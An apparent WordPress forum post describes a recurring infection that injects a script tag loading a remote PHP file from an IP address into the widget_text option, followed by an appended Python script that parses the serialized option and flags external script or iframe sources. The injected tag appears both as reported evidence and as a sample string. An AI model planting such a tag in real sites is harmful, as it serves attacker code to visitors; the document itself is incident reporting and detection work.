Hey guys.
We've been using Gravity Forms for quite a while now without any issue, but recently one of our sites has been regularly suffering from malware infections.
It injects an entry into the wp_options table and attaches the extra div containing the offsite script below the Gravity Form widgets like thus:
<div class="textwidget">
<script type="text/javascript" src="http://61.19.251.27/web/cb.php"></script>
</div>
Which, in the DB can be seen as:
mysql> select * from wp_options where option_value like "%http://61.19.251.27/web/cb.php%";
+-----------+-------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------+
| option_id | option_name | option_value | autoload |
+-----------+-------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------+
| 87 | widget_text | a:3:{i:3;a:3:{s:5:"title";s:0:"";s:4:"text";s:0:"";s:6:"filter";b:0;}i:7;a:3:{s:5:"title";s:1:" ";s:4:"text";s:78:"<script type="text/javascript" src="http://61.19.251.27/web/cb.php"></script>";s:6:"filter";b:0;}s:12:"_multiwidget";i:1;} | yes |
+-----------+-------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------+
1 row in set (0.00 sec)
It's not a lot of information but it's all we have at this stage. As I mentioned, it's happened once before - it's no trouble removing the infection when it occurs, but preventing it in the first place is giving us trouble.
I've bumped up the logging for this site so that if it happens again we might get a better lock on it. Also this is not an on-disk attack, that is to say that no files are modified. So the injection is done through WordPress itself. It may not be the Gravity Forms plugin that is the target of the exploit, but it does seem strangely close to it.
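A detection check for the symptom described in the post, added here as an example and not part of the original post or of Gravity Forms: a Python script that parses the PHP-serialized widget_text option_value (the subset WordPress uses: arrays, strings, ints, bools, null) and flags Text widgets whose body loads a script or iframe from a host outside an allowlist. The sample values are constructed to match the row shown above; the allowlist, the function names and the second "clean" sample are assumptions.

```python
import re
from typing import Any, Dict, List, Set, Tuple
from urllib.parse import urlparse

# Constructed sample: the shape of the widget_text row quoted in the post.
# The src URL is the indicator the post reports; it is used only as a string to match.
INJECTED_TAG = '<script type="text/javascript" src="http://61.19.251.27/web/cb.php"></script>'
SAMPLE_WIDGET_TEXT = (
    'a:3:{'
    'i:3;a:3:{s:5:"title";s:0:"";s:4:"text";s:0:"";s:6:"filter";b:0;}'
    f'i:7;a:3:{{s:5:"title";s:1:" ";s:4:"text";s:{len(INJECTED_TAG)}:"{INJECTED_TAG}";s:6:"filter";b:0;}}'
    's:12:"_multiwidget";i:1;}'
)
# Constructed sample of a benign Text widget for comparison.
CLEAN_WIDGET_TEXT = (
    'a:2:{i:2;a:3:{s:5:"title";s:5:"Hello";s:4:"text";s:19:"<p>Welcome back</p>";'
    's:6:"filter";b:0;}s:12:"_multiwidget";i:1;}'
)


def _parse(data: str, pos: int) -> Tuple[Any, int]:
    """Parse one PHP-serialized value starting at pos; return (value, next_pos)."""
    t = data[pos]
    if t == 'N':                       # N;
        return None, pos + 2
    if t in 'ibd':                     # i:3;  b:0;  d:1.5;
        end = data.index(';', pos)
        raw = data[pos + 2:end]
        if t == 'i':
            return int(raw), end + 1
        if t == 'b':
            return raw == '1', end + 1
        return float(raw), end + 1
    if t == 's':                       # s:<byte length>:"<bytes>";
        colon = data.index(':', pos + 2)
        length = int(data[pos + 2:colon])
        start = colon + 2              # skip ':"'
        value = data[start:start + length]
        # Lengths are byte counts; a mismatch means the value was edited or truncated.
        if data[start + length:start + length + 2] != '";':
            raise ValueError(f'string length mismatch at offset {pos}')
        return value.encode('latin-1').decode('utf-8', 'replace'), start + length + 2
    if t == 'a':                       # a:<count>:{key;value;...}
        colon = data.index(':', pos + 2)
        count = int(data[pos + 2:colon])
        p = colon + 2                  # skip ':{'
        result: Dict[Any, Any] = {}
        for _ in range(count):
            key, p = _parse(data, p)
            val, p = _parse(data, p)
            result[key] = val
        if data[p] != '}':
            raise ValueError(f'expected "}}" at offset {p}')
        return result, p + 1
    raise ValueError(f'unsupported type {t!r} at offset {pos}')


def php_unserialize(value: str) -> Any:
    """Unserialize a PHP value. Strings are walked as latin-1 so s: lengths count bytes."""
    data = value.encode('utf-8').decode('latin-1')
    result, end = _parse(data, 0)
    if end != len(data):
        raise ValueError(f'trailing data after offset {end}')
    return result


# Match src= on <script> and <iframe> tags, with or without quotes around the URL.
_SRC_PATTERNS = {
    'script': re.compile(r'<script\b[^>]*\bsrc\s*=\s*["\']?([^"\'\s>]+)', re.I),
    'iframe': re.compile(r'<iframe\b[^>]*\bsrc\s*=\s*["\']?([^"\'\s>]+)', re.I),
}


def find_suspicious_widgets(serialized: str, allowed_hosts: Set[str]) -> List[Dict[str, Any]]:
    """Return one finding per external script/iframe src found in any Text widget body."""
    try:
        widgets = php_unserialize(serialized)
    except ValueError as exc:
        # WordPress would silently treat this as an empty option; during an
        # investigation a value that no longer unserializes is itself a finding.
        return [{'widget': None, 'tag': None, 'src': None, 'host': None,
                 'reason': f'unserialize failed: {exc}'}]
    findings: List[Dict[str, Any]] = []
    if not isinstance(widgets, dict):
        return findings
    for widget_id, widget in widgets.items():
        if not isinstance(widget, dict):
            continue                   # e.g. the '_multiwidget' => 1 marker
        text = str(widget.get('text', ''))
        for tag, pattern in _SRC_PATTERNS.items():
            for src in pattern.findall(text):
                host = urlparse(src if '//' in src else '//' + src).hostname or ''
                if host not in allowed_hosts:
                    findings.append({'widget': widget_id, 'tag': tag, 'src': src,
                                     'host': host, 'reason': 'external src'})
    return findings


if __name__ == '__main__':
    for hit in find_suspicious_widgets(SAMPLE_WIDGET_TEXT, {'example.com'}):
        print(hit)
```

Feed it the option_value string from the SELECT shown in the post (or from a nightly dump of wp_options) and keep the allowlist to the hosts you actually serve scripts from; because it works on the stored value rather than rendered pages, it catches the injection even when the widget is only placed on a few pages.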